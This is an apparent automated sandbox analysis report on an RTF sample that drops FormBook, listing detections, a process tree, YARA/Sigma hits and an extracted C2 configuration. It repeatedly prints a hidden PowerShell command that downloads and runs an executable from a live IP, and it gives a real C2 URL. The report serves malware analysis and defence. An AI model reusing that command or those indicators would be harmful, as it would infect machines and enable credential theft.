
Analysis Report 1c60a1e9_by_Libranalysis

Overview

General Information

Sample Name: 1c60a1e9_by_Libranalysis (renamed file extension from none to rtf)
Analysis ID: 412069
MD5: 1c60a1e972aaa5a3eb15c0adc2de7ead
SHA1: 921fed27f6b23f7f810ee03eeefb91634a295592
SHA256: 605e84b01e008da482a744feb468d9dd842148850fda1694a6772b6e38cc6c82

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Document exploit detected (process start blacklist hit)
Found suspicious RTF objects
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Microsoft Office creates scripting files
Modifies the context of a thread in another process (thread injection)
Office process drops PE file
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Exploit for CVE-2017-0261
Sigma detected: Non Interactive PowerShell
Sigma detected: PowerShell Download from URL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2300 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • powershell.exe (PID: 2684 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • docsc.exe (PID: 2952 cmdline: 'C:\Users\user\AppData\Roaming\docsc.exe' MD5: 457B22DA77D4DB093A31DD80A4B8963F)
        • docsc.exe (PID: 2268 cmdline: C:\Users\user\AppData\Roaming\docsc.exe MD5: 457B22DA77D4DB093A31DD80A4B8963F)
        • docsc.exe (PID: 2240 cmdline: C:\Users\user\AppData\Roaming\docsc.exe MD5: 457B22DA77D4DB093A31DD80A4B8963F)
          • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • NAPSTAT.EXE (PID: 660 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
              • cmd.exe (PID: 2468 cmdline: /c del 'C:\Users\user\AppData\Roaming\docsc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • FLTLDR.EXE (PID: 2384 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT MD5: AF5CCD95BAC7ADADD56DE185D7461B2C)
    • powershell.exe (PID: 2788 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 2896 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rogegalmish.com/a8si/"], "decoy": ["mosquitocontrolpro.com", "omfgphil.com", "qqkit.net", "compusolutionsac.com", "skynetaccess.com", "helmetmoto.com", "webdomoupravitel.com", "thepocket-onlinelesson.xyz", "stefaniehirsch.space", "goalsandballs.com", "xn--bro-ba-3ya.com", "tomrings.com", "4520oceanviewavenue.com", "mamaebemorientada.com", "shopwreathrails.com", "restaurantestancia.com", "annaquatics.info", "mnarchitect.design", "best-cleaner.com", "jobhuizhan.com", "check-info-bank.network", "boostcoachingonline.com", "basimogroup.com", "076fb5.com", "conansr.icu", "numbereightturquoise.com", "southernbrushworks.com", "home-inland.com", "irrpa.com", "ethereumdailypay.com", "betsysellsswfl.com", "cutebyconstance.website", "modelsnt.com", "medifilt.com", "tracisolomon.xyz", "dchaulingdisposal.com", "minchenhy.com", "smart4earth.com", "rackembilliards.com", "benschiller-coaching.com", "virtualroasters.com", "applewholesales.com", "thesidspot.com", "grechenblogs.com", "marshlandlogisticsservices.net", "covidokotoks.com", "mirabilla.com", "hunab.tech", "foreverjsdesigns.com", "heipacc.info", "simon-schilling.com", "shirleyeluiz.com", "juguetibicicollectors.com", "70shousemanchester.com", "tranthaolinh.net", "urbanpokebar.com", "madras-spice.com", "fulmardelta.net", "drisu-goalkeeping.com", "jiotest.com", "vitatiensa.com", "melbournebusinesslawyers.net", "rajehomes.com", "company-for-you.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.2095013575.0000000000210000.00000004.00000020.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
    • 0x327b:$sb1: -W Hidden
    • 0x326b:$sc1: -NoP
    • 0x3275:$sd1: -NonI
    • 0x3285:$se3: -ExecutionPolicy bypass
    • 0x3270:$sf1: -sta
    0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      12.2.docsc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        12.2.docsc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        12.2.docsc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        12.2.docsc.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          12.2.docsc.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          System Summary:

          Sigma detected: Microsoft Office Product Spawning Windows Shell
          Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', ProcessId: 2684
          Sigma detected: PowerShell DownloadFile
          Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', ProcessId: 2684
          Sigma detected: Exploit for CVE-2017-0261
          Source: Process started | Author: Florian Roth | Data: Command: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, CommandLine: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, CommandLine|base64offset|contains: , Image: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, NewProcessName: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, OriginalFileName: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, ProcessId: 2384
          Sigma detected: Non Interactive PowerShell
          Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', ProcessId: 2684
          Sigma detected: PowerShell Download from URL
          Source: Process started | Author: Florian Roth, oscd.community, Jonhnathan Ribeiro | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', ProcessId: 2684

          Data Obfuscation:

          Sigma detected: Powershell download and execute file
          Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'', ProcessId: 2684

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.rogegalmish.com/a8si/"], "decoy": ["mosquitocontrolpro.com", "omfgphil.com", "qqkit.net", "compusolutionsac.com", "skynetaccess.com", "helmetmoto.com", "webdomoupravitel.com", "thepocket-onlinelesson.xyz", "stefaniehirsch.space", "goalsandballs.com", "xn--bro-ba-3ya.com", "tomrings.com", "4520oceanviewavenue.com", "mamaebemorientada.com", "shopwreathrails.com", "restaurantestancia.com", "annaquatics.info", "mnarchitect.design", "best-cleaner.com", "jobhuizhan.com", "check-info-bank.network", "boostcoachingonline.com", "basimogroup.com", "076fb5.com", "conansr.icu", "numbereightturquoise.com", "southernbrushworks.com", "home-inland.com", "irrpa.com", "ethereumdailypay.com", "betsysellsswfl.com", "cutebyconstance.website", "modelsnt.com", "medifilt.com", "tracisolomon.xyz", "dchaulingdisposal.com", "minchenhy.com", "smart4earth.com", "rackembilliards.com", "benschiller-coaching.com", "virtualroasters.com", "applewholesales.com", "thesidspot.com", "grechenblogs.com", "marshlandlogisticsservices.net", "covidokotoks.com", "mirabilla.com", "hunab.tech", "foreverjsdesigns.com", "heipacc.info", "simon-schilling.com", "shirleyeluiz.com", "juguetibicicollectors.com", "70shousemanchester.com", "tranthaolinh.net", "urbanpokebar.com", "madras-spice.com", "fulmardelta.net", "drisu-goalkeeping.com", "jiotest.com", "vitatiensa.com", "melbournebusinesslawyers.net", "rajehomes.com", "company-for-you.com"]}
          Multi AV Scanner detection for submitted file
          Source: 1c60a1e9_by_Libranalysis.rtf | ReversingLabs: Detection: 31%
          Yara detected FormBook
          Source: Yara match | File source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe | Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\docsc.exe | Joe Sandbox ML: detected
          Source: 12.2.docsc.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: mscorlib.pdbment.Automation.pdb" source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: docsc.exe, NAPSTAT.EXE
          Source: Binary string: mscorlib.pdbment.Automation.pdbBBo source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2099945495.0000000002B66000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\System.pdba source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2104233288.0000000002730000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2109112416.000000001B490000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2111059281.000000001B510000.00000002.00000001.sdmp
          Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

          Software Vulnerabilities:

          Document exploit detected (creates forbidden files)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScT
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe
          Document exploit detected (drops PE files)
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: docsc[1].exe.0.dr
          Document exploit detected (process start blacklist hit)
